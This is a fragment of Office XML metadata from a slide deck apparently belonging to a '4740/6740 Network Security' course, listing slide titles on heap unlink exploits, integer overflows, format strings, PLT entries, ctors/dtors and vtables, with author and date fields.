      <vt:lpstr>List Handling</vt:lpstr>
      <vt:lpstr>unlink</vt:lpstr>
      <vt:lpstr>unlink</vt:lpstr>
      <vt:lpstr>unlink</vt:lpstr>
      <vt:lpstr>unlink</vt:lpstr>
      <vt:lpstr>unlink Exploits</vt:lpstr>
      <vt:lpstr>Basic Exploit Scenario</vt:lpstr>
      <vt:lpstr>unlink Exploit</vt:lpstr>
      <vt:lpstr>unlink Exploit</vt:lpstr>
      <vt:lpstr>Composing the Buffer</vt:lpstr>
      <vt:lpstr>Vulnerable Program</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Inspecting the Heap</vt:lpstr>
      <vt:lpstr>Comments</vt:lpstr>
      <vt:lpstr>More Vulnerabilities</vt:lpstr>
      <vt:lpstr>More Vulnerabilities</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Representation</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Width Overflows</vt:lpstr>
      <vt:lpstr>Sign Overflows</vt:lpstr>
      <vt:lpstr>Sign Overflows</vt:lpstr>
      <vt:lpstr>Format Strings</vt:lpstr>
      <vt:lpstr>Format Strings</vt:lpstr>
      <vt:lpstr>Format Strings</vt:lpstr>
      <vt:lpstr>Vulnerable Program</vt:lpstr>
      <vt:lpstr>Vulnerable Program</vt:lpstr>
      <vt:lpstr>Vulnerable Program</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Constructing a Value</vt:lpstr>
      <vt:lpstr>Writing Large Values</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Function Pointers</vt:lpstr>
      <vt:lpstr>PLT</vt:lpstr>
      <vt:lpstr>PLT Entries</vt:lpstr>
      <vt:lpstr>Function Resolution</vt:lpstr>
      <vt:lpstr>Function Resolution</vt:lpstr>
      <vt:lpstr>Function Resolution</vt:lpstr>
      <vt:lpstr>PLT Entries</vt:lpstr>
      <vt:lpstr>Vulnerable Program</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>ctors, dtors</vt:lpstr>
      <vt:lpstr>ctors, dtors</vt:lpstr>
      <vt:lpstr>ctors, dtors</vt:lpstr>
      <vt:lpstr>_start</vt:lpstr>
      <vt:lpstr>__libc_csu_init</vt:lpstr>
      <vt:lpstr>ctors</vt:lpstr>
      <vt:lpstr>dtors</vt:lpstr>
      <vt:lpstr>dtors</vt:lpstr>
      <vt:lpstr>dl_fini</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>vtables</vt:lpstr>
      <vt:lpstr>vtables</vt:lpstr>
      <vt:lpstr>vtables</vt:lpstr>
      <vt:lpstr>vtables</vt:lpstr>
      <vt:lpstr>vtables</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation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4740/6740 Network Security</dc:title>
  <dc:creator>bowlinearl@live.com</dc:creator>
  <cp:lastModifiedBy>bowlinearl@live.com</cp:lastModifiedBy>
  <cp:revision>1118</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-18T16:53:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-03-17T18:56:38Z</dcterms:modified>
</cp:coreProperties>
</file>